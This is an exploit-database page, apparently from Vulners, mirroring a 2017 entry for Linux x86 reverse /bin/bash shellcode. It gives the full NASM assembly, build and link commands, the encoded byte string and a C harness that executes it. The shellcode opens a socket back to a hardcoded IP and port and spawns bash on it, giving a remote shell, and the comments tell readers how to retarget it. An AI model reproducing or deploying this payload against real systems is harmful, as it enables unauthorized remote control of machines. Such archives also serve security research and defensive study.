Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)

🗓️ 27 Mar 2017 00:00:00Reported by JR0ch17Type 
zdt
 zdt🔗 0day.today👁 12 Views

Linux x86 Reverse /bin/bash Shellcode to create reverse shell on specific IP and por

Code
/*
; File name: reversebash.nasm
; Author:  Jasmin Landry (@JR0ch17)
; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119
; To change
; Shellcode length: 110 bytes
; Tested on Ubuntu 12.04.5 32-bit (x86)
; Assemble reversebash.nasm file: nasm -f elf32 -o reversebash.o reversebash.nasm -g
; Link: ld -z execstack -o reversebash reversebash.o
; Use objdump to find shellcode and copy it over to the code section of the .c file
; Compile: gcc -m32 -fno-stack-protector -z execstack reversebash.c -o reversebash2
 
global _start           
 
section .text
_start:
    jmp short call_shellcode
 
shellcode:
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
 
    pop edx 
 
    push 0x6
    push 0x1
    push 0x2
 
    mov al, 0x66
    mov bl, 0x1
    mov ecx, esp
    int 0x80
 
    mov esi, eax
 
    xor eax, eax
    push eax
    push dword [edx+2]
    push word [edx]
    push word 0x2
    mov ecx, esp
    push 0x10
    push ecx
    push esi
    mov al, 0x66
    mov bl, 0x3
    mov ecx, esp
    int 0x80
 
    xor ecx, ecx
    mov cl, 0x3
 
loop:
    dec cl
    mov al, 0x3f
    mov ebx, esi
    int 0x80
 
    mov esi, eax
    jnz loop
 
    xor eax, eax
    xor ecx, ecx
    push ecx
    push 0x68736162
    push 0x2f6e6962
    push 0x2f2f2f2f
    mov ebx, esp
    push ecx
    push ebx
    mov al, 0xb
    mov ecx, esp
    xor edx, edx
    int 0x80
 
call_shellcode:
    call shellcode
    port: db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 ;First 2 bytes are port and last 4 are IP. Please change these bytes to reflect your environment and recompile.
 
*/
 
 
#include<stdio.h>
#include<string.h>
 
unsigned char code[] = \
"\xeb\x61\x31\xc0\x31\xdb\x31\xc9\x5a\x6a\x06\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc6\x31\xc0\x50\xff\x72\x02\x66\xff\x32\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb0\x66\xb3\x03\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\x89\xf3\xcd\x80\x89\xc6\x75\xf4\x31\xc0\x31\xc9\x51\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x51\x53\xb0\x0b\x89\xe1\x31\xd2\xcd\x80\xe8\x9a\xff\xff\xff\xd4\x31\xc0\xa8\x03\x77"; //Again, the last 4 bytes are the IP and the 2 before those are the port.
 
main()
{
 
        printf("Shellcode Length:  %d\n", strlen(code));
 
        int (*ret)() = (int(*)())code;
 
        ret();
 
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Mar 2017 00:00Current
7.1High risk
Vulners AI Score7.1
linuxx86reverse shellcode/bin/bashport 54321ip 192.168.3.119ubuntu32-bitassemblynetworksecurity
12